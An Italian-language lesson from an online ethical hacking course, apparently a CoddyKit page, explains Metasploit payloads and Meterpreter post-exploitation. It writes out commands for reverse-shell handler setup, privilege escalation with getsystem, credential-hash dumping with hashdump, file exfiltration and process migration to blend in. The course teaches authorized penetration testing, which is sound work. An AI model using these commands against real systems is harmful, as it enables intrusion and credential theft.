0Pricing
Ethical Hacking Academy · Lezione

Payload e Meterpreter

Shell post-exploitation

Payload e Meterpreter è una lezione Ethical Hacking Academy gratuita su CoddyKit. Questa è la lezione 3 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Ethical Hacking Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Che cos'è un payload?

Un payload è il codice che viene eseguito sul target dopo il successo di un exploit. Definisce le operazioni successive possibili, dall'esecuzione di un singolo comando all'apertura di una shell interattiva completa.

La scelta del payload corretto dipende dal sistema operativo del target, dalla configurazione di rete e dal livello di accesso necessario.

Staged e stageless

I payload prevedono due modalità di distribuzione:

  • Staged (noti la / in meterpreter/reverse_tcp): invia prima uno stub di piccole dimensioni, che scarica poi il payload completo. L'impatto iniziale è minore.
  • Stageless (noti il carattere _ in meterpreter_reverse_tcp): l'intero payload viene distribuito in una sola volta. È più affidabile sulle reti instabili.

Shell bind e reverse

Esistono due direzioni di connessione:

  • Bind shell: il target apre una porta e resta in attesa; lei si connette a essa. Spesso viene bloccata dai firewall.
  • Reverse shell: il target si connette nuovamente a lei (LHOST/LPORT). In genere riesce a superare i firewall che consentono le connessioni in uscita.

Per questo motivo, i payload reverse sono spesso l'impostazione predefinita.

Alla scoperta di Meterpreter

Meterpreter è il payload avanzato di Metasploit. A differenza di una shell di comandi di base, viene eseguito in memoria, comunica tramite un canale crittografato e offre un ricco set di comandi per la post-exploitation.

Poiché evita di scrivere sul disco, è più discreto rispetto al rilascio di un eseguibile separato.

Comandi fondamentali di Meterpreter

Una volta ottenuta una sessione Meterpreter, alcuni comandi fondamentali consentono di orientarsi nel target.

sysinfo      # OS, architecture, hostname
getuid       # current user context
ps           # running processes
pwd  ls  cd  # filesystem navigation

Trasferimento di file

Meterpreter trasferisce file tra il suo computer e il target tramite semplici comandi, utili per acquisire prove o predisporre strumenti nei test autorizzati.

download C:\\Users\\admin\\secret.txt /tmp/
upload /tmp/tool.exe C:\\Windows\\Temp\\

Passaggio a una shell di sistema

Il comando shell porta da Meterpreter all'interprete dei comandi nativo del target (cmd.exe o /bin/sh) quando ha bisogno di eseguire direttamente comandi a livello di sistema operativo.

Digiti exit per tornare al prompt di Meterpreter senza perdere la sessione.

shell
# C:\> whoami
# exit  -> back to meterpreter

Escalation dei privilegi

Spesso si ottiene inizialmente un accesso con privilegi limitati. Meterpreter aiuta a eseguire l'escalation:

  • getsystem tenta tecniche note per ottenere i privilegi SYSTEM su Windows.
  • Il modulo post local_exploit_suggester consiglia exploit locali per l'escalation dei privilegi sull'host.

Privilegi più elevati consentono di estrarre credenziali e ottenere un accesso più approfondito.

getsystem
run post/multi/recon/local_exploit_suggester

Migrazione dei processi

La sua sessione risiede all'interno di un processo. Se il processo è instabile o potrebbe essere terminato, esegua la migrate in un processo più stabile e di lunga durata per mantenere attiva la sessione.

Migrare in un processo che corrisponde al suo livello di privilegi aiuta anche a confondersi con l'attività legittima e può modificare il contesto dell'utente.

ps
migrate 1340     # migrate into a stable PID

Mantenimento dell'accesso

Meterpreter include funzionalità per acquisire dati utili durante le valutazioni autorizzate, come hashdump per raccogliere gli hash delle password e gli strumenti keyscan per dimostrare l'impatto dell'acquisizione dell'input.

Usi queste funzionalità solo nell'ambito concordato e documenti ogni operazione nella relazione per il cliente.

hashdump
run post/windows/gather/checkvm

Handler

Un payload reverse richiede un servizio in ascolto sul suo lato per intercettare la connessione. Il modulo multi/handler svolge questa funzione. Lo configuri con lo stesso payload, LHOST e LPORT usati per generare il payload.

È essenziale quando distribuisce un payload di msfvenom al di fuori della console: avvii prima l'handler, quindi attivi il payload sul target.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 4444
exploit -j

Verifica rapida

Scelga il payload in grado di aggirare un firewall restrittivo.

Riepilogo

Ha imparato a conoscere i payload e Meterpreter:

  • I payload possono essere staged (/) o stageless (_), nonché bind o reverse; quelli reverse in genere superano più facilmente i firewall.
  • Meterpreter viene eseguito in memoria tramite un canale crittografato e offre numerosi comandi.
  • Attività fondamentali: sysinfo, getuid, ps, download/upload, shell.
  • Esegua l'escalation con getsystem e local_exploit_suggester; usi migrate per la stabilità.
  • Usi le funzionalità di raccolta solo nell'ambito autorizzato e documenti ogni operazione.

Prossimo argomento: moduli post-exploitation, pivoting e raccolta di dati.

Domande Frequenti

La lezione «Payload e Meterpreter» è gratuita?

Sì — il testo completo di «Payload e Meterpreter» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Ethical Hacking Academy, passa a CoddyKit PRO. Il corso Ethical Hacking Academy include 4 lezioni in totale.

Cosa imparerò in «Payload e Meterpreter»?

Shell post-exploitation Eserciti Ethical Hacking Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Ethical Hacking Academy?

Non è richiesta alcuna esperienza precedente. Ethical Hacking Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 3 di 4.

Quanto tempo richiede la lezione «Payload e Meterpreter»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Ethical Hacking Academy?

Sì. Ogni lezione Ethical Hacking Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Architettura di Metasploit
  2. Ricerca e uso degli exploit
  3. Payload e Meterpreter
  4. Moduli post-exploitation
← Torna a Ethical Hacking Academy